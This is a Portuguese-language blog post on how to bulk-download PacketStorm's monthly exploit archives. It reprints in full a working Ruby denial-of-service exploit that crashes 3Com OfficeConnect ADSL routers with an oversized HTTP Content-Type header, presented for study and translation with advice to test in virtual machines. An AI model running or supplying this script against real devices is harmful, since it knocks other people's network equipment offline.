Download mensal e anual dos exploits do PacketStorm (Versão Legado do site)

Download mensal e anual dos exploits do PacketStorm

Este site é um dos mais conhecidos pela comunidade de segurança. Inclusive é um dos objetivos que o site Segurança Linux tem a alcançar. A tradução dos papers, exploits, vídeos e outros materiais. Em meados de 2009, o projeto Backtrack Brasil já estava traduzindo parte do conteúdo deste site, mas resolvemos ajudar e colaborar com esta ótima ideia que é o SEL (SEgurança Linux). Passo 1:

Entre no site PacketStorm com seu browser preferido.

Passo 2:

Geralmente quando vamos procurar algum exploit ou outras informações, como quais são os exploits encontrados mais atualizados, clicamos no menu “Exploits: By Month”. Em português, seria “Exploits: Por Mês” durante o ano atual. No caso deste artigo o ano corrente é 2010.

Passe o mouse em cima do link do mês de Março 2010 (March 2010):

Veja que na parte inferior do navegador é exibido o caminho (path). Provavelmente estão armazenados os exploits compactados em um único pacote TGZ.

Passo 3:

Caso você precise de todos os exploits, sem ter que ler um por um e facilitar o processo de tradução e teste dos exploits, é bem simples:

Passo 4:

Você clica na pasta que corresponde ao Ano e Mês, dos exploits e depois no fim da URL, você adiciona “AnoMes.tgz”, sem as aspas, como na figura abaixo:

Se uma tela de download aparecer, faça o download e você terá o código-fonte de todos os exploits.

Vamos ver um exemplo de exploit do mês de dezembro de 2009, que em inglês seria a data curta em formato AAMM (ano e mês).

O exploit 3com_ctdos.rb.txt é feito em Ruby, devido a presença do extensão *.rb antes do *.txt (provavelmente adicionaram a extensão *.txt para evitar problemas em alguns antivírus). O código-fonte (source code) contém comandos de Ruby e o próprio autor afirmou, no código-fonte, que a linguagem utilizada era Ruby (veja em Exploit language -> Ruby).

Explicando a ideia do exploit 3com_ctdos.rb.txt

Modelo do equipamento que o autor testou:

  • Model -> Tested on 3Com OfficeConnect ADSL Wireless 11g Firewall Router 3CRWDR100A-72 and 3CRWDR100Y-72

Versão do firmware que foi testado e quando.

  • Software Version -> Tested on 2.06T13 (Apr 2007, last version for these routers)

Quais os SO foram testados:

  • Attacker -> Tested from GNU/Linux (Sidux and Ubuntu) and Windows 7

Linguagem de programação usada para a exploração (exploit):

  • Exploit language -> Ruby

Tipo de ataque, no caso DoS – Denial of Service (Negação de Serviço) via HTTP:

  • Type -> Remote Denial of Service Exploit by HTTP

Informações adicionais sobre este exploit:

  • Additional info: The bug can be exploited with Tamper Data (Firefox Addon) too, LOL.

Quem foi o autor do exploit e como contactá-lo:

 

Código-fonte (source Code) do exploit “3com_ctdos.rb.txt”

###############
# Model -> Tested on 3Com OfficeConnect ADSL Wireless
# 11g Firewall Router 3CRWDR100A-72 and 3CRWDR100Y-72
# Software Version -> Tested on 2.06T13 (Apr 2007,
# last version for these routers)
# Attacker -> Tested from GNU/Linux (Sidux and Ubuntu) and Windows 7
#
# Exploit languaje -> Ruby
# Type -> Remote Denial of Service Exploit by HTTP
#
# Additional info:
# – The bug can be exploited with Tamper Data (Firefox Addon) too, LOL.
#
###############
# Discovered and written by Alberto Ortega
# http://pentbox.net/
###############

require “socket”

host = ARGV[0]
buffer = “A”
send = “”

puts “”
if !host
puts ” 3Com OfficeConnect ADSL Wireless 11g Firewall Router”
puts ” Remote DoS Exploit by HTTP”
puts ” —— Usage —————————————”
puts ” ruby 3com_dosexploit.rb host”
puts ” Ex: ruby 3com_dosexploit.rb 192.168.1.1″
else
begin
socket = TCPSocket.new(host, 80)
puts “- Exploiting …”
# 8.times is enough to DoS
9.times do
buffer = “#{buffer}#{buffer}”
end

# Here are the HTTP packet, Content-Type value causes the DoS
send = “GET / HTTP/1.1\r\nContent-Type:#{buffer}\r\n”
socket.write(send)
puts “- Successfully! :)”
rescue
puts “Connection problem”
end
end
puts “”

 

Obs.: Em alguns SO com antivírus, será detectado como vírus mesmo sendo arquivo de texto puro, pois os arquivos são examinados internamente. Você já tem sua coleção de exploits, que são como “escorpiões” e “aranhas” para estudarmos.

Tome cuidado ao usá-los e NÃO TESTE EM SEU PRÓPRIO COMPUTADOR, POIS VOCÊ PODERÁ TER PROBLEMAS. Monte uma máquina virtual em VirtualBox, VMware ou QEMU e faça testes antes.

Não esqueça de passar no site do Backtrack Brasil.

Good Pentesting!

@firebitsbr

Deixe uma resposta

Preencha os seus dados abaixo ou clique em um ícone para log in:

Logotipo do WordPress.com

Você está comentando utilizando sua conta WordPress.com. Sair / Alterar )

Imagem do Twitter

Você está comentando utilizando sua conta Twitter. Sair / Alterar )

Foto do Facebook

Você está comentando utilizando sua conta Facebook. Sair / Alterar )

Foto do Google+

Você está comentando utilizando sua conta Google+. Sair / Alterar )

Conectando a %s